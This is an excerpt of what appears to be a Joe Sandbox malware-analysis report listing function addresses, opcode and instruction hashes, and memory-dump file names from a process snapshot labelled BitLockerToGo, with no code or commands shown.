                                                                                                                                                                                                                                      • Opcode ID: ddb13934ca7257e04b7104aa39deb9adf13839b8146f9a7c54d0457027f63c02
                                                                                                                                                                                                                                      • Instruction ID: 9e5cb6660ed22717cc069f2fa4b84f3febb7781ca835c4a537932d7ce75b0bda
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddb13934ca7257e04b7104aa39deb9adf13839b8146f9a7c54d0457027f63c02
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9121445800D2E048C717873540A55A2BFE29DAF00D76ED1CEE4DC0E3A7D19BC65BEB26
                                                                                                                                                                                                                                      Function 00499201 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0fe2a3d79104f28b59ea9c79c513ed586e314b6956ec43db58cae6efc883a1c9
                                                                                                                                                                                                                                      • Instruction ID: ec7ac2ee380f74e6d3b0cf2ec693c0ffb68a5a193d53b95d350dd66b1f610122
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe2a3d79104f28b59ea9c79c513ed586e314b6956ec43db58cae6efc883a1c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121FF5800D2E048CB1B473540A45A2BFE25DAB10D77ED1DED4D81E3A7D15BC54BEB36
                                                                                                                                                                                                                                      Function 004A4281 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 19fa23f392c66ed2ed4a94094c6aa485ae71feb6442575f29470d0aea7db6a17
                                                                                                                                                                                                                                      • Instruction ID: f1e3cd9b6160b908588ee87bd6f75616e105d7f92fcf484686b7bd17b273d831
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19fa23f392c66ed2ed4a94094c6aa485ae71feb6442575f29470d0aea7db6a17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C21FF4800D2E049CB1B4B3540A45A2BFE25DAB10D77ED4DED4D80E3A7D15BC68BEB36
                                                                                                                                                                                                                                      Function 004B03F1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e70e3030db4564b20123ccdffc825bedc9d401722d9f145ac8fc1062c86115fe
                                                                                                                                                                                                                                      • Instruction ID: 2752a3e60b8eedf1b6b50e41fdd7b12ced2618b6b82f63de0b0feb08aea87cdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e70e3030db4564b20123ccdffc825bedc9d401722d9f145ac8fc1062c86115fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA211E4800D2E048CB17873540A45A2BFE25DAF00D76ED1CED4D80E3A7C15BC68BEB36
                                                                                                                                                                                                                                      Function 004AE681 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: abd48071c24565944acd4f97b7ffb62fb7cc09df8c24fd9d08da1c56c7ac4b0d
                                                                                                                                                                                                                                      • Instruction ID: 101399028f5ceb9637c0964808c661465373c5a79e6aa6963dadb782e930a6c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abd48071c24565944acd4f97b7ffb62fb7cc09df8c24fd9d08da1c56c7ac4b0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5921335800D2E058CB17873540A45A2BFE29DAF00E76ED1CED4D80E3A7C15BC69BDB36
                                                                                                                                                                                                                                      Function 004A3771 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 728e9fedc22f713670da3b7873579e903afece37133b04349660371047bffd92
                                                                                                                                                                                                                                      • Instruction ID: e00acf8383e0fd861f796302dc4474dd65729b59b5afc9e65bb63347dde3a437
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 728e9fedc22f713670da3b7873579e903afece37133b04349660371047bffd92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3921348800D2E048CB17873540A45A2BFE29DAF00D77ED1CED4D80E3A7D15BC65BDB26
                                                                                                                                                                                                                                      Function 004AE891 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2dddc3ae5d79591e94c4f05113a170dc90e5fd4895dba75a18115aeae0c7d697
                                                                                                                                                                                                                                      • Instruction ID: 873d92b0c50d6dd695ac3ecbb3f5de9c042afba5d5a6f0df426e549deb9bcc33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dddc3ae5d79591e94c4f05113a170dc90e5fd4895dba75a18115aeae0c7d697
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B121FE4800D2E049CB17873540A45A2BFE25DAF10E76ED1DED4D80E3A7D15BC69BEB36
                                                                                                                                                                                                                                      Function 00499EB1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9725490adadea0b600eb91ac405ae37b4d96a52c47c4c8814fdc6d8a711c9517
                                                                                                                                                                                                                                      • Instruction ID: a167057a5d1c398e02a86d598391d9b112c56a228139306730aab13363c7cfea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9725490adadea0b600eb91ac405ae37b4d96a52c47c4c8814fdc6d8a711c9517
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0421334810D2E048CB17873540A45A2BFE29DAF10D76ED1CED4D80E3A7C19BC59BEB36
                                                                                                                                                                                                                                      Function 004A0F61 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6b4134d5474dd1320d7d115f71ea7aef92e19537a8998b26eee4ae38a33436ca
                                                                                                                                                                                                                                      • Instruction ID: effa0efbf8a9472648a9efc619191f1956929bbf3d5ade64943c0d82f07fa629
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b4134d5474dd1320d7d115f71ea7aef92e19537a8998b26eee4ae38a33436ca
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD211C4800D2E048CB17873540A45A2BFE29DAF00D76ED1CED4D80E3A7C19BC58BEB36
                                                                                                                                                                                                                                      Function 004ADF31 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ce533a2442e7379c1ee370b802eda0ba5791851e023bd3aa6aae52e5cc2747fe
                                                                                                                                                                                                                                      • Instruction ID: 42f1f8ce8ec87b4981649deabc675b5fba1e4097823d160cc912d5f1240a2ab3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce533a2442e7379c1ee370b802eda0ba5791851e023bd3aa6aae52e5cc2747fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D212F4810D2E048CB17873500A45A2BFE29DAF00D76ED1DED4D80E3A7C15BC69BEB36
                                                                                                                                                                                                                                      Function 004AEFA1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ae83cd39ea4285a2964d32310dee1969d0ce347001ff603cbdb6b5f273a316cd
                                                                                                                                                                                                                                      • Instruction ID: 6d2ce0bd071e33e9930cf0dab181d7cd2cf23e975c3c3eaa22aef954e11a453f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae83cd39ea4285a2964d32310dee1969d0ce347001ff603cbdb6b5f273a316cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6621234800D2E048CB17873540A45A2BFE25DAF00D76ED1CED4D81E3A7C15BC65BDB36
                                                                                                                                                                                                                                      Function 0049B111 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5e79932d91eec9b090c41c185e6009df1f886cdbcdce255273637c8a3f120efd
                                                                                                                                                                                                                                      • Instruction ID: 79c4405c74aedad68968102afebb3491a62369c8c40cecc024eb0f8c9d8bf7f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e79932d91eec9b090c41c185e6009df1f886cdbcdce255273637c8a3f120efd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A21FF4800D2E049CB178B3540A45A2BFE25DAB10D77ED4DED4D80E3A7D19BC54BD736
                                                                                                                                                                                                                                      Function 0049A251 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 80ad132769024b487fb7db42e4f85327fd1d38b9ad1b2c1ad447df71e2284cbc
                                                                                                                                                                                                                                      • Instruction ID: 28ae8de8d4e9b75c86965f0a7a4d1fa4c903063ca88e3672198cb2bd89918068
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80ad132769024b487fb7db42e4f85327fd1d38b9ad1b2c1ad447df71e2284cbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37211E8800D2E059CB17873540A45A2BFE29DAF00D76ED1DED4D80E3A7D1ABC55BEB36
                                                                                                                                                                                                                                      Function 0049B5F1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 87db0d390c71906262d173a45d37bdfb3c6545be7d2af0e2003fd2bb84de9f10
                                                                                                                                                                                                                                      • Instruction ID: c4f2a9cdc8082226aa5dc92bb6ccacaac286aabf4e2c80392831f35fc5919b82
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87db0d390c71906262d173a45d37bdfb3c6545be7d2af0e2003fd2bb84de9f10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4210E4800D2E049CB1B8B3540A45A2BFE25DAB10D77ED0DED4D80E3A7D1ABC64BE736
                                                                                                                                                                                                                                      Function 004995B1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 924cf3cb111e56807a34f664eb42770a2c732ac6a50befd7fa5ed03cb72598e1
                                                                                                                                                                                                                                      • Instruction ID: b0c7ae79d80864b3f6fad989d45833f9953d722d8e1e06bbbba95cf214d7a63c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924cf3cb111e56807a34f664eb42770a2c732ac6a50befd7fa5ed03cb72598e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB21FD4800D2E049CB17873540A45A2BFE25DAB00E77ED5DED4D80E3A7D1ABC64BEB36
                                                                                                                                                                                                                                      Function 004B1631 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f55171486b2fb0ea77ea4c0e6ad6fa9b3197e06130c5023ff041e20013d8126f
                                                                                                                                                                                                                                      • Instruction ID: 37c13b986ec0c331b971a67db040d7069186ab5468c62f58aaf484b2d3752337
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f55171486b2fb0ea77ea4c0e6ad6fa9b3197e06130c5023ff041e20013d8126f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F210F4800D2E049CB178B3540A45A2BFE25DAF00E76ED1DED4D80E3A7D16BC65BEB36
                                                                                                                                                                                                                                      Function 004A06D1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5cddecfab3588a6aa8e25ab7edabe6be825868f8837ae1fc5c721ba297e5dc4c
                                                                                                                                                                                                                                      • Instruction ID: 0e5932e0c0f8588d030e50b132799d94f6797cd4821ff467fcdeefb8ac0a784b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cddecfab3588a6aa8e25ab7edabe6be825868f8837ae1fc5c721ba297e5dc4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B21FB4800D2E099CB17873540A49A2BFE25DAF10D76ED1DED4D80E3A7D1ABC54BEB36
                                                                                                                                                                                                                                      Function 004AE741 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 504526613c6ef4d9243add4e9dc71d9259066664b1a6e881bb632fb92e0795b3
                                                                                                                                                                                                                                      • Instruction ID: 312caa49238f7d465dfbcc643c10bf28f8cd1156b9f13c2bb7d264d5d4cd0c82
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 504526613c6ef4d9243add4e9dc71d9259066664b1a6e881bb632fb92e0795b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF21244800D2E058C717873540A55A2BFE29DAF00E76ED2DED4DC0E3A7D26BC65BDB26
                                                                                                                                                                                                                                      Function 004AFEA1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2e07c3e1779008a86cf3eb233d5dd0ab2ed264349fc1565ef576421b5dde33e4
                                                                                                                                                                                                                                      • Instruction ID: e5490fbd909f519426f27afc1d9150920e4e71f5aa3ca1b058c06505b2aa1c50
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e07c3e1779008a86cf3eb233d5dd0ab2ed264349fc1565ef576421b5dde33e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221134800D2E049CB17873540A45A2BFE25DAF00E76ED5DED4D80E3A7D16BC65BDB26
                                                                                                                                                                                                                                      Function 004B6EA2 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0d6ae9f52c151d7e46e201c8a2b222f6b9db5f53bcb09f8bd4f9de897f8c1940
                                                                                                                                                                                                                                      • Instruction ID: 5ef46fb17154aacb09a9c7cc4bb11225e5f003e3a0e6954a29689fbc8bca245e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d6ae9f52c151d7e46e201c8a2b222f6b9db5f53bcb09f8bd4f9de897f8c1940
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32118614EE51B12EC2416E3C84D45F27B90DABF1177FD5789C988A7243C2099227CF51
                                                                                                                                                                                                                                      Function 0049A1B1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c9719d352403777157bc5f056026850cd9f9740910fd1190d521b509222fc322
                                                                                                                                                                                                                                      • Instruction ID: c2a18fdc1a8211987f16facf0527672f2d98ea94df95c7f123b6d977748e8cc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9719d352403777157bc5f056026850cd9f9740910fd1190d521b509222fc322
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E211D4800D2E048CB1B8B3540A45A2BFE25DAB10D77ED0CED4D80E3A7D1ABC54BEB36
                                                                                                                                                                                                                                      Function 004A4341 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d9586121d9a60884e107de3ecaca72f4b4672ba1bf55abd4e18fceaf52fb741f
                                                                                                                                                                                                                                      • Instruction ID: 5a0435ed28c872830ee0b584da4fcd625377a7ea1b8756931a13eeac2d55e7dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9586121d9a60884e107de3ecaca72f4b4672ba1bf55abd4e18fceaf52fb741f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1421234800D2E058CB17873540A45A2BFE25DAF00D76ED1CED4D80E3A7D1ABC65BEB36
                                                                                                                                                                                                                                      Function 004AF3F1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a011e695a1e94ba62a284a524975a293324041fc7f88f32de45d2e217e62b592
                                                                                                                                                                                                                                      • Instruction ID: 3874fdc27a90d14e1d0f44501cb038b30759dcc7673d84f9c27dc215caf3cc7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a011e695a1e94ba62a284a524975a293324041fc7f88f32de45d2e217e62b592
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E21435800D2E048C717873540A45A2BFE29DAF00E76ED1CED4DC0E3A7D26BC65BEB22
                                                                                                                                                                                                                                      Function 004B1381 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 01fd3e914aa3832bfd3038984adc40b67e800ec6d6cb082a6eb7e8463ee9ff72
                                                                                                                                                                                                                                      • Instruction ID: 3cf2ba81e9a504cff7dfce71866f09b5032f94177752f6eb65f4001c1fad4a33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01fd3e914aa3832bfd3038984adc40b67e800ec6d6cb082a6eb7e8463ee9ff72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7121465800D2E048C717873540A45A2BFE25DAF00E76ED1CED4D80E3A7D15BC65BDB32
                                                                                                                                                                                                                                      Function 0049A631 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
